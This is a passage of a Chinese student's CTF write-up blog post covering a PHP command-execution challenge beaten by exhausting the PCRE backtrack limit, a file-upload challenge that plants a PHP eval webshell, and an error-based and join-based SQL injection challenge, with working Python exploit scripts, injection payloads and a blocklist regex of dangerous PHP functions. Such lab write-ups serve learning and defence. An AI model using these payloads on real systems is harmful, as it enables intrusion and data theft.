<p>$command = json_decode($txw4ever,true)[‘cmd’]; 里，这里的[‘cmd’]指的是key，所以我们待会要先对应构造一个键值对，但是现在还要把python学透一点才能更好的理解。</p>
<p>绕过preg_match后，还有对command的过滤，这里也直接放源码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/\^|\||\~|assert|print|include|require|\(|echo|flag|data|php|glob|sys|phpinfo|POST|GET|REQUEST|exec|pcntl|popen|proc|socket|link|passthru|file|posix|ftp|\_|disk|tcp|cat|tac/i</span><br></pre></td></tr></table></figure>

<p>过滤了无字母数字，无参数RCE以及绕过disable_function的一些操作，同时也防了一手写马操作</p>
<p>这里放出了反引号，说到反引号很快就想到了echo <code>ls</code>这种命令执行，但是echo被ban了，但这里又放出了php短标签</p>
<h5 id="PHP中有两种短标签"><a href="#PHP中有两种短标签" class="headerlink" title="PHP中有两种短标签"></a>PHP中有两种短标签</h5><p>使用Ctrl+F搜索short_open_tag ，然后将等号后面的Off改成On.</p>
<??><p>和<?=xxx?>。其中，<??>相当于对&lt;?php&gt;的替换。</p>
<p><strong>而<?=?>则是相当于&lt;? echo&gt;。</strong></p>
<p>所以构造出cmd命令为?&gt;即可完成</p>
<h5 id="RCE（这篇博客很全面）"><a href="#RCE（这篇博客很全面）" class="headerlink" title="RCE（这篇博客很全面）"></a><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_45521281/article/details/105585709?spm=1001.2101.3001.6661.1&utm_medium=distribute.pc_relevant_t0.none-task-blog-2~default~CTRLIST~Rate-1.pc_relevant_aa&depth_1-utm_source=distribute.pc_relevant_t0.none-task-blog-2~default~CTRLIST~Rate-1.pc_relevant_aa&utm_relevant_index=1">RCE</a>（这篇博客很全面）</h5><p><img src="../images/2-16491512329425.png" alt="2"></p>
<p>flag在/flag，利用大量脏数据触发PCRE的回溯上限，再RCE</p>
<p>exp:</p>
<p>码一个简单的python脚本</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line"></span><br><span class="line">payload = &#x27;&#123;&quot;cmd&quot;:&quot;?&gt;&lt;?= `tail /f*`?&gt;&quot;,&quot;test&quot;:&quot;&#x27; + &quot;@&quot;*(1000000) + &#x27;&quot;&#125;&#x27;</span><br><span class="line">两个键值对构成。</span><br><span class="line"></span><br><span class="line"># #tail</span><br><span class="line"># Linux中用于查看文件尾部的内容，与head相对应。</span><br><span class="line"># 常用来查看日志文件，通过-f实时查看文件最新内容。</span><br><span class="line">res = requests.post(&quot;http://1.14.71.254:28090/&quot;, data=&#123;&quot;letter&quot;:payload&#125;)</span><br><span class="line">print(res.text)</span><br></pre></td></tr></table></figure>



<h4 id="例题"><a href="#例题" class="headerlink" title="例题"></a>例题</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">function is_php($data)&#123;</span><br><span class="line">return preg_match(&#x27;/&lt;?.*[(`;?&gt;].*/is&#x27;, $data);</span><br><span class="line">&#125;</span><br><span class="line">if(empty($_FILES)) &#123;</span><br><span class="line">die(show_source(__FILE__));</span><br><span class="line">&#125;</span><br><span class="line">$user_dir = &#x27;data/&#x27; . md5($_SERVER[&#x27;REMOTE_ADDR&#x27;]);</span><br><span class="line">$data = file_get_contents($_FILES[&#x27;file&#x27;][&#x27;tmp_name&#x27;]);</span><br><span class="line">if (is_php($data)) &#123;</span><br><span class="line">echo &quot;bad request&quot;;</span><br><span class="line">&#125; else &#123;</span><br><span class="line">@mkdir($user_dir, 0755);</span><br><span class="line">$path = $user_dir . &#x27;/&#x27; . random_int(0, 10) . &#x27;.php&#x27;;</span><br><span class="line">move_uploaded_file($_FILES[&#x27;file&#x27;][&#x27;tmp_name&#x27;], $path);</span><br><span class="line">header(&quot;Location: $path&quot;, true, 303);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这里主要的问题的是正则的问题</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">/&lt;?.*[(`;?&gt;].*/is  //这个正则会验证我们上传文件的内容是否有php代码</span><br><span class="line">&lt;?.*匹配php的开头和文件内容  而[(`;?&gt;]匹配php代码的末尾，</span><br><span class="line">但是正则末尾还有.* ——一个贪婪匹配他会继续匹配代码末尾是否还有代码</span><br><span class="line">之后根据ph牛的文章</span><br><span class="line">https://www.leavesongs.com/PENETRATION/use-pcre-backtrack-limit-to-bypass-restrict.html</span><br><span class="line">我们可以让正则一直回溯知道超出他回溯的上限</span><br></pre></td></tr></table></figure>

<p>那我们就可以通过脚本从而得到flag</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line">from io import BytesIO</span><br><span class="line">files = &#123;</span><br><span class="line">&#x27;file&#x27;: BytesIO(&#x27;&lt;?php eval($_REQUEST[sky]);//&#x27;+&#x27;a&#x27; * 1000000)</span><br><span class="line">&#125;</span><br><span class="line">r = requests.post(&#x27;http://127.0.0.1/ctf/1.php&#x27;, files=files, allow_redirects=False)</span><br><span class="line">path = r.headers[&#x27;Location&#x27;]</span><br><span class="line">url = &#x27;http://127.0.0.1/ctf/&#x27;+path</span><br><span class="line"># print url</span><br><span class="line">data = &#123;</span><br><span class="line"># &#x27;sky&#x27;:&quot;var_dump(scandir(&#x27;../../../&#x27;));&quot;</span><br><span class="line">&#x27;sky&#x27;:&quot;var_dump(file_get_contents(&#x27;../../../flag.php&#x27;));&quot;</span><br><span class="line">&#125;</span><br><span class="line">r = requests.post(url=url,data=data)</span><br><span class="line">print (r.content)</span><br></pre></td></tr></table></figure>

<h3 id="11-join-us"><a href="#11-join-us" class="headerlink" title="11.join-us"></a>11.join-us</h3><p>又是sql注入的题目，来看看吧：</p>
<p>测试后发现是单引号注入，并且有存在过滤（这里可以用python脚本跑也可以用bpfuzz)，当然脚本不是很齐全，所以还是会有一些漏网之鱼。</p>
<p>这里可以调节长度：</p>
<p><img src="../images/Inked3_LI.jpg" alt="Inked3_LI"></p>
<p>该字符是非法字符: union<br>该字符是非法字符: and<br>该字符是非法字符: sleep<br>该字符是非法字符: by<br>该字符是非法字符: as<br>该字符是非法字符: if<br>该字符是非法字符: ascii<br>该字符是非法字符: left<br>该字符是非法字符: right<br>该字符是非法字符: substring<br>该字符是非法字符: handler<br>该字符是非法字符: updatexml<br>该字符是非法字符: benchmark<br>该字符是非法字符: insert<br>该字符是非法字符: update<br>该字符是非法字符: &amp;<br>该字符是非法字符: “<br>该字符是非法字符: =</p>
<p>然后发现wp:</p>
<p>fuzz出来发现or是可用的，但是构造语句时又发现被waf拦住了，其实后端对or是过滤了的，但又没完全过滤</p>
<p>看了一眼自己的通过字符：感觉可以用报错extractvalue()试试，还可以并上||一起使用：</p>
<p>sql语句中“ ||” 符号表示，连接符。</p>
<p>比如’111’||’222’ 其结果就是’111222’。</p>
<h5 id="SQL-中的特殊符号："><a href="#SQL-中的特殊符号：" class="headerlink" title="SQL 中的特殊符号：||"></a><strong>SQL 中的特殊符号：</strong>||</h5><p>‘  – 单引号</p>
<p>“  –双引号</p>
<p>&amp; – 并且</p>
<p>||  – 连接符</p>
<p>@ –定义变量</p>
<p>% – 模糊查询符号</p>
<p>*  – 通配符</p>
<p>()  – 括号 </p>
<p>–  –注释</p>
<hr>
<p>测过有四个id,然后之前做题时有遇到怎么</p>
<h5 id="替代-，用like。"><a href="#替代-，用like。" class="headerlink" title="替代=，用like。"></a>替代=，用like。</h5><p>然后我才发现自己过滤的不全面还有好多都没有过滤，就用了bp：</p>
<p>发现as被过滤了，也就是说</p>
<h5 id="database-过滤：利用回显的报错来获取到库名或者用mysql-innodb-table-stats绕过（持久化统计信息）"><a href="#database-过滤：利用回显的报错来获取到库名或者用mysql-innodb-table-stats绕过（持久化统计信息）" class="headerlink" title="database()过滤：利用回显的报错来获取到库名或者用mysql.innodb_table_stats绕过（持久化统计信息）"></a>database()过滤：利用回显的报错来获取到库名或者用<code>mysql.innodb_table_stats</code>绕过（持久化统计信息）</h5><p>不能用了，啊这：</p>
<p>wp提供了一种思路：其实转换一下思路就会发现库名很容易获得，我们一开始输入的 1’ 回显了报错，那我们是不是可以利用回显的报错来获取到库名呢，payload如下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">-1&#x27; || (select*from aa或bb)#    或者你一定要用or也可以</span><br><span class="line">-1&#x27; or(select*from aa或bb)#//aa为不存在的表名</span><br></pre></td></tr></table></figure>

<p>发现回显了sqlsql.aa/bb，所以sqlsql为表名。</p>
<p>然后下一步就是用十六进制替换然后当成表名注入：</p>
<p>tt=-1’ || extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema like 0x73716c73716c),0x7e))#</p>
<p>然后<img src="../images/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202022-04-05%20173230-16491512102763.png" alt="屏幕截图 2022-04-05 173230"></p>
<p>法2：</p>
<p><img src="../images/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202022-04-05%20180423.png" alt="屏幕截图 2022-04-05 180423"></p>
<h5 id="column又被禁止：无列名注入"><a href="#column又被禁止：无列名注入" class="headerlink" title="column又被禁止：无列名注入"></a>column又被禁止：无列名注入</h5><p>这里可以用无列名注入：这种题型在很早之前的sql培训中学长就讲过，有一点印象，所以我们就用join注入：</p>
<p>padload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">-1&#x27; || extractvalue(1,concat(0x7e,(select*from (select*from output a join output b)c)))#</span><br></pre></td></tr></table></figure>

<p>第一个表名Fal_flag就是引诱大家先去注这个表，flag在另一个表</p>
<h5 id="对表起一个新名字有三种方式，"><a href="#对表起一个新名字有三种方式，" class="headerlink" title="对表起一个新名字有三种方式，"></a>对表起一个新名字有三种方式，</h5><p>一种是加个括号再加个名，如 (select*from output)c 那这个查询的结果内容就被归整为一个叫做“c”的表中；</p>
<p>第二种就是直接用as，如 select output as a 那此时这个output就不叫output了，他叫 “a”；</p>
<p>第三种就是这个as可以忽略，</p>
<h5 id="join注入"><a href="#join注入" class="headerlink" title="join注入"></a><a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_48083470/article/details/119043137?spm=1001.2101.3001.6650.3&utm_medium=distribute.pc_relevant.none-task-blog-2~default~CTRLIST~Rate-3.pc_relevant_paycolumn_v3&depth_1-utm_source=distribute.pc_relevant.none-task-blog-2~default~CTRLIST~Rate-3.pc_relevant_paycolumn_v3&utm_relevant_index=6">join注入</a></h5><p>join 为连接查询 ，能将多个表连接一起查询</p>
<p>当我改变on 后面的条件时查询的内容也会变化<br>第一个查询 连接建立的条件是 a表中的id=1，所以当a表中的id为1时<br>那么就可以连接到 b 表 ，也就可以查出内容<br>同理 第二个查询是b表的id为条件</p>
<p>select * from test as a join test as b on a.id=b.id and a.score=b.score;</p>
<p>查询结果总共包含4列，id score id score</p>
<p>select * from test as a join test as b using(id,score);</p>
<p>查询结果总共包含2列， id score</p>
<h5 id="join-left-和right在sql注入中的利用"><a href="#join-left-和right在sql注入中的利用" class="headerlink" title="join left 和right在sql注入中的利用"></a>join left 和right在sql注入中的利用</h5><p>在sql注入中 有的过滤会把where给过滤掉，同时if的判断也不太好用<br>那么就可以用join 后面的on 来进行我们想要的判断</p>
<p>所以padload：</p>
<p>-1’ || extractvalue(1,concat(0x7e,(select<em>from (select</em>from output a join output b)c)))#</p>
<p>tt=-1’ || extractvalue(1,concat(0x7e,(select * from (select * from output a join output)b),0x7e))#</p>
<p>最后就是字段的读取了：</p>
<p>tt=-1’ || extractvalue(1,concat(0x7e,(select data from output),0x7e))#</p>
<p>但是没办法读全，所以我们要用到</p>
<h5 id="字符串截断函数"><a href="#字符串截断函数" class="headerlink" title="字符串截断函数"></a>字符串截断函数</h5><h6 id="mid"><a href="#mid" class="headerlink" title="mid()"></a>mid()</h6><p><strong>mid()函数</strong></p>
<p>此函数为截取字符串一部分。</p>
<p>MID(column_name,start[,length])</p>
<p>Sql用例：</p>
<p>MID((SELECT table_name FROM INFORMATION_SCHEMA.TABLES WHERE T table_schema=0xxxxxxx LIMIT 0,1),1,1)&gt;’a’此处column_name参数可以为sql语句，可自行构造sql语句进行注入。</p>
<table>
<thead>
<tr>
<th><strong>参数</strong></th>
<th><strong>描述</strong></th>
</tr>
</thead>
<tbody><tr>
<td>column_name</td>
<td>必需。要提取字符的字段。</td>
</tr>
<tr>
<td>start</td>
<td>必需。规定开始位置（起始值是 1）。</td>
</tr>
<tr>
<td>length</td>
<td>可选。要返回的字符数。如果省略，则 MID() 函数返回剩余文本。</td>
</tr>
</tbody></table>
<h6 id="substr-函数"><a href="#substr-函数" class="headerlink" title="substr()函数"></a><strong>substr()函数</strong></h6><p>  Substr()和substring()函数实现的功能是一样的，均为截取字符串。</p>
<p>  string substring(string, start, length)</p>
<p>  string substr(string, start, length)</p>
<p>  参数描述同mid()函数，第一个参数为要处理的字符串，start为开始位置，length为截取的长度。</p>
<p>substr((SELECT table_name FROM INFORMATION_SCHEMA.TABLES WHERE T table_schema=0xxxxxxx LIMIT 0,1),1,1)&gt;’a’此处string参数可以为sql语句，可自行构造sql语句进行注入。</p>
<h6 id="Left-函数"><a href="#Left-函数" class="headerlink" title="Left()函数"></a><strong>Left()函数</strong></h6><p>Left()得到字符串左部指定个数的字符</p>
<p>Left ( string, n )    string为要截取的字符串，n为长度。</p>
<p>Sql用例：</p>
<p>(1) left(database(),1)&gt;’a’,查看数据库名第一位，left(database(),2)&gt;’ab’,查看数据库名前二位。</p>
<h6 id="常联系使用-ORD-函数（不属于截断）"><a href="#常联系使用-ORD-函数（不属于截断）" class="headerlink" title="(常联系使用)ORD()函数（不属于截断）"></a>(常联系使用)ORD()函数（不属于截断）</h6><p>此函数为返回第一个字符的ASCII码，经常与上面的函数进行组合使用。</p>
<p>例如ORD(MID(DATABASE(),1,1))&gt;114 意为检测database()的第一位ASCII码是否大于114，也即是‘r’</p>
<h3 id="12-hardsql"><a href="#12-hardsql" class="headerlink" title="12. hardsql"></a>12. hardsql</h3><p>这一题要打盲注脚本，所以我想先把python学完在来系统学习一下盲注脚本的写法，这里先不做了。</p>
<h2 id="总结-1"><a href="#总结-1" class="headerlink" title="总结"></a>总结</h2><p>感觉这种入门难度的ctf比赛适合自己的水平，但是平时如果不多练题，多接触题型，了解特征，在比赛的时候即使题目太简单也只能坐牢，所以还是要多练习题型和多拓展知识面为这一阶段的重点。</p>
<p>1.系统学习常见题型并练习题目：</p>
<p>sql,√</p>
<p>xss,√</p>
<p>ssti,</p>
<p>ssrf,</p>
<p>csrf,</p>
<p>rce,</p>
<p>upload,</p>
<p>php简单函数绕过，</p>
<p>phpserialize</p>
<p>2.python脚本学习</p>

                
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        Author:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">hz</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        Link:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="http://example.com/2022/03/29/NISA%E7%9A%84%E8%B5%9B%E9%A2%98%E5%A4%8D%E7%8E%B0/">http://example.com/2022/03/29/NISA%E7%9A%84%E8%B5%9B%E9%A2%98%E5%A4%8D%E7%8E%B0/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        Reprint policy:
                    </i>
                </span>
                <span class="reprint-info">
                    All articles in this blog are used except for special statements
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    reprint policy. If reproduced, please indicate source
                    <a href="/about" target="_blank">hz</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>Copied successfully, please follow the reprint policy of this article</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">more</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/game/">
                                    <span class="chip bg-color">game</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
                <style>
    #reward {
        margin: 40px 0;
        text-align: center;
    }

    #reward .reward-link {
        font-size: 1.4rem;
        line-height: 38px;
    }

    #reward .btn-floating:hover {
        box-shadow: 0 6px 12px rgba(0, 0, 0, 0.2), 0 5px 15px rgba(0, 0, 0, 0.2);
    }

    #rewardModal {
        width: 320px;
        height: 350px;
    }

    #rewardModal .reward-title {
        margin: 15px auto;
        padding-bottom: 5px;
    }

    #rewardModal .modal-content {
        padding: 10px;
    }

    #rewardModal .close {
        position: absolute;
        right: 15px;
        top: 15px;
        color: rgba(0, 0, 0, 0.5);
        font-size: 1.3rem;
        line-height: 20px;
        cursor: pointer;
    }

    #rewardModal .close:hover {
        color: #ef5350;
        transform: scale(1.3);
        -moz-transform:scale(1.3);
        -webkit-transform:scale(1.3);
        -o-transform:scale(1.3);
    }

    #rewardModal .reward-tabs {
        margin: 0 auto;
        width: 210px;
    }

    .reward-tabs .tabs {
        height: 38px;
        margin: 10px auto;
        padding-left: 0;
    }

    .reward-content ul {
        padding-left: 0 !important;
    }

    .reward-tabs .tabs .tab {
        height: 38px;
        line-height: 38px;
    }

    .reward-tabs .tab a {
        color: #fff;
        background-color: #ccc;
    }

    .reward-tabs .tab a:hover {
        background-color: #ccc;
        color: #fff;
    }

    .reward-tabs .wechat-tab .active {
        color: #fff !important;
        background-color: #22AB38 !important;
    }

    .reward-tabs .alipay-tab .active {
        color: #fff !important;
        background-color: #019FE8 !important;
    }

    .reward-tabs .reward-img {
        width: 210px;
        height: 210px;
    }
</style>

<div id="reward">
    <a href="#rewardModal" class="reward-link modal-trigger btn-floating btn-medium waves-effect waves-light red">赏</a>

    <!-- Modal Structure -->
    <div id="rewardModal" class="modal">
        <div class="modal-content">
            <a class="close modal-close"><i class="fas fa-times"></i></a>
            <h4 class="reward-title">你的赏识是我前进的动力</h4>
            <div class="reward-content">
                <div class="reward-tabs">
                    <ul class="tabs row">
                        <li class="tab col s6 alipay-tab waves-effect waves-light"><a href="#alipay">支付宝</a></li>
                        <li class="tab col s6 wechat-tab waves-effect waves-light"><a href="#wechat">微 信</a></li>
                    </ul>
                    <div id="alipay">
                        <img src="/medias/reward/alipay.jpg" class="reward-img" alt="支付宝打赏二维码">
                    </div>
                    <div id="wechat">
                        <img src="/medias/reward/wechat.png" class="reward-img" alt="微信打赏二维码">
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<script>
    $(function () {
        $('.tabs').tabs();
    });
</script>

            
        </div>
    </div>

    

    

    

    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="fas fa-chevron-left"></i>&nbsp;Previous</div>
            <div class="card">
                <a href="/2022/03/29/python%E8%AE%B0%E5%BD%95/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/9.jpg" class="responsive-img" alt="python记录">
                        
                        <span class="card-title">python记录</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                        <span class="publish-date">
                            <i class="far fa-clock fa-fw icon-date"></i>2022-03-29
                        </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            hz
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/python/">
                        <span class="chip bg-color">python</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                Next&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2022/03/25/game-week2/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/21.jpg" class="responsive-img" alt="game-week2">
                        
                        <span class="card-title">game-week2</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2022-03-25
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            hz
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/game/">
                        <span class="chip bg-color">game</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>



<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>

<!-- 代码语言 -->

<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script>


    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget card" style="background-color: white;">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;TOC</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h2, h3, h4'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h2, h3, h4').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>






    <footer class="page-footer bg-color">
    
        <link rel="stylesheet" href="/libs/aplayer/APlayer.min.css">
<style>
    .aplayer .aplayer-lrc p {
        
        display: none;
        
        font-size: 12px;
        font-weight: 700;
        line-height: 16px !important;
    }

    .aplayer .aplayer-lrc p.aplayer-lrc-current {
        
        display: none;
        
        font-size: 15px;
        color: #42b983;
    }

    
    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body {
        left: -66px !important;
    }

    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body:hover {
        left: 0px !important;
    }

    
</style>
<div class="">
    
    <div class="row">
        <meting-js class="col l8 offset-l2 m10 offset-m1 s12"
                   server="netease"
                   type="playlist"
                   id="503838841"
                   fixed='true'
                   autoplay='false'
                   theme='#42b983'
                   loop='all'
                   order='random'
                   preload='auto'
                   volume='0.7'
                   list-folded='true'
        >
        </meting-js>
    </div>
</div>

<script src="/libs/aplayer/APlayer.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/meting@2/dist/Meting.min.js"></script>

    

    <div class="container row center-align"
         style="margin-bottom: 0px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            
                <span id="year">2019-2022</span>
            
            <span id="year">2019</span>
            <a href="/about" target="_blank">hz</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            <br>
            
            
            
                
            
            
                <span id="busuanzi_container_site_pv">
                &nbsp;|&nbsp;<i class="far fa-eye"></i>&nbsp;Total visits:&nbsp;
                    <span id="busuanzi_value_site_pv" class="white-color"></span>
            </span>
            
            
                <span id="busuanzi_container_site_uv">
                &nbsp;|&nbsp;<i class="fas fa-users"></i>&nbsp;Total visitors:&nbsp;
                    <span id="busuanzi_value_site_uv" class="white-color"></span>
            </span>
            
            <br>

            <!-- 运行天数提醒. -->
            
            <br>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">
    <a href="https://github.com/shianer" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
        <i class="fab fa-github"></i>
    </a>



    <a href="mailto:292595085@qq.com" class="tooltipped" target="_blank" data-tooltip="邮件联系我" data-position="top" data-delay="50">
        <i class="fas fa-envelope-open"></i>
    </a>







    <a href="tencent://AddContact/?fromId=50&fromSubId=1&subcmd=all&uin=292595085" class="tooltipped" target="_blank" data-tooltip="QQ联系我: 292595085" data-position="top" data-delay="50">
        <i class="fab fa-qq"></i>
    </a>







    <a href="/atom.xml" class="tooltipped" target="_blank" data-tooltip="RSS 订阅" data-position="top" data-delay="50">
        <i class="fas fa-rss"></i>
    </a>

</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;Search</span>
            <input type="search" id="searchInput" name="s" placeholder="Please enter a search keyword"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script type="text/javascript">
$(function () {
    var searchFunc = function (path, search_id, content_id) {
        'use strict';
        $.ajax({
            url: path,
            dataType: "xml",
            success: function (xmlResponse) {
                // get the contents from search data
                var datas = $("entry", xmlResponse).map(function () {
                    return {
                        title: $("title", this).text(),
                        content: $("content", this).text(),
                        url: $("url", this).text()
                    };
                }).get();
                var $input = document.getElementById(search_id);
                var $resultContent = document.getElementById(content_id);
                $input.addEventListener('input', function () {
                    var str = '<ul class=\"search-result-list\">';
                    var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                    $resultContent.innerHTML = "";
                    if (this.value.trim().length <= 0) {
                        return;
                    }
                    // perform local searching
                    datas.forEach(function (data) {
                        var isMatch = true;
                        var data_title = data.title.trim().toLowerCase();
                        var data_content = data.content.trim().replace(/<[^>]+>/g, "").toLowerCase();
                        var data_url = data.url;
                        data_url = data_url.indexOf('/') === 0 ? data.url : '/' + data_url;
                        var index_title = -1;
                        var index_content = -1;
                        var first_occur = -1;
                        // only match artiles with not empty titles and contents
                        if (data_title !== '' && data_content !== '') {
                            keywords.forEach(function (keyword, i) {
                                index_title = data_title.indexOf(keyword);
                                index_content = data_content.indexOf(keyword);
                                if (index_title < 0 && index_content < 0) {
                                    isMatch = false;
                                } else {
                                    if (index_content < 0) {
